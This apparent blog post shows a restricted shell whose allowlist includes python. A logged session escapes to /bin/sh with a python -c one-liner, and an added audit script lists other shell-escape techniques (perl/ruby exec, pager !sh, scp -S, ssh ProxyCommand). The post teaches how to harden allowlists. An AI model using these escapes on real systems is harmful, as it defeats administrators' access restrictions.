Picket Fence

Here’s a tip: if you’re going to confine users inside a severely restricted shell where only a tiny handful of commands are allowed, making one of those approved commands the Python interpreter defeats the purpose. A general-purpose interpreter can exec any program on the box, so the allowlist is only as strong as its weakest entry.


When you log into picket, you can only use a limited number of commands.
Type "commands" to see a complete list of available commands.


commands        output a brief list of all available commands
help            display a list of commands with description
logout          exit this program
passwd          change your file server password
quota           check your quota or disk usage
scp             secure copy
sftp            secure ftp server (only for connecting TO this host from another host)
webfix          fixes permissions in an existing www directory


fsh> commands
bye                 cd                  chgrp               chmod
commands            du                  exit                help
logout              ls                  mailbox             man
passwd              pwd                 python              quit
quota               rdistd              rm                  rmfile
scp                 sftp                source              webfix
/opt/ssh/libexec/sftp-server ?                 
fsh> python -c 'import os; os.system("/bin/sh")'
$
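The session above shows the escape by hand. As an added example (not from the original post, and not the fsh shell's own code), here is the check a reviewer would run against such an allowlist: parse the `commands` listing, and flag every entry with a known way to reach an unrestricted shell. The python entry is the one the post demonstrates; the other catalog entries (pager escapes in `man`, `scp -S`, and the interpreter one-liners) are standard shell-escape mechanisms for those programs, and whether fsh's `man`, `scp` and `source` behave like their usual namesakes is an assumption.

```python
"""Audit a restricted shell's allowlist for commands that can spawn a shell.

Added example. The escape catalog below is this example's own; only the
python escape comes from the original session. That fsh's 'man', 'scp'
and 'source' behave like the usual commands of those names is an assumption.
"""
import re

# Sample input: the output of `fsh> commands` from the session above
# (the trailing sftp-server line is left out).
FSH_COMMANDS_OUTPUT = """\
bye                 cd                  chgrp               chmod
commands            du                  exit                help
logout              ls                  mailbox             man
passwd              pwd                 python              quit
quota               rdistd              rm                  rmfile
scp                 sftp                source              webfix
"""

# Known ways an allowed command hands the user an unrestricted shell.
#   direct:      the command itself can exec a shell with no setup
#   argument:    an option makes it run a program of the user's choosing
#   interactive: an interactive sub-mode (pager, editor) has a shell escape
ESCAPE_CATALOG = {
    "python": ("direct", "python -c 'import os; os.system(\"/bin/sh\")'"),
    "perl":   ("direct", "perl -e 'exec \"/bin/sh\"'"),
    "ruby":   ("direct", "ruby -e 'exec \"/bin/sh\"'"),
    "man":    ("interactive", "output goes through a pager; in less/more type !sh"),
    "less":   ("interactive", "type !sh at the pager prompt"),
    "more":   ("interactive", "type !sh at the pager prompt"),
    "vi":     ("interactive", ":!sh"),
    "vim":    ("interactive", ":!sh"),
    "scp":    ("argument", "scp -S <program> runs <program> locally in place of ssh"),
    "ssh":    ("argument", "ssh -o ProxyCommand=<program> x"),
    # Assumption: fsh's 'source' reads commands from a file, as a shell's does.
    "source": ("argument", "executes a file the user can upload with scp/sftp"),
}


def parse_command_listing(text):
    """Turn the columnar `commands` output into a sorted list of names.

    Tokens that are not bare command names (paths, stray '?') are dropped.
    """
    names = set()
    for line in text.splitlines():
        for tok in line.split():
            if re.fullmatch(r"[A-Za-z0-9_.+-]+", tok):
                names.add(tok)
    return sorted(names)


def audit_allowlist(commands, catalog=ESCAPE_CATALOG):
    """Return {command: (kind, how)} for every allowed command in the catalog."""
    return {c: catalog[c] for c in commands if c in catalog}


def verdict(commands, catalog=ESCAPE_CATALOG):
    """PASS only if no allowed command is a known escape; also list the
    'direct' ones, since those need no preparation at all."""
    findings = audit_allowlist(commands, catalog)
    direct = sorted(c for c, (kind, _) in findings.items() if kind == "direct")
    return ("FAIL" if findings else "PASS"), direct


def report(text):
    """Human-readable audit of a `commands` listing."""
    cmds = parse_command_listing(text)
    status, direct = verdict(cmds)
    lines = [f"{len(cmds)} allowed commands, verdict: {status}"]
    for cmd, (kind, how) in sorted(audit_allowlist(cmds).items()):
        lines.append(f"  {cmd:<8} {kind:<12} {how}")
    if direct:
        lines.append(f"  direct escapes need no setup: {', '.join(direct)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(FSH_COMMANDS_OUTPUT))
```

Run it against the listing from the post and it reports FAIL, with `python` as a direct escape and `man`, `scp` and `source` as escapes that need a pager prompt, an option, or an uploaded file. The point of separating the kinds is that dropping `python` alone does not get you to PASS: every entry has to be checked for whether it can exec something else, not just for whether its name sounds harmless.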

One Response

  1. Most excellent. This kind of thing always puts a smile on my face.

    Brings back to mind the words of a Security professor I once had who said “The most important way to secure your computers is through equal parts paranoia and common sense.”

    Oh well. They got one out of two, and that ain’t bad.
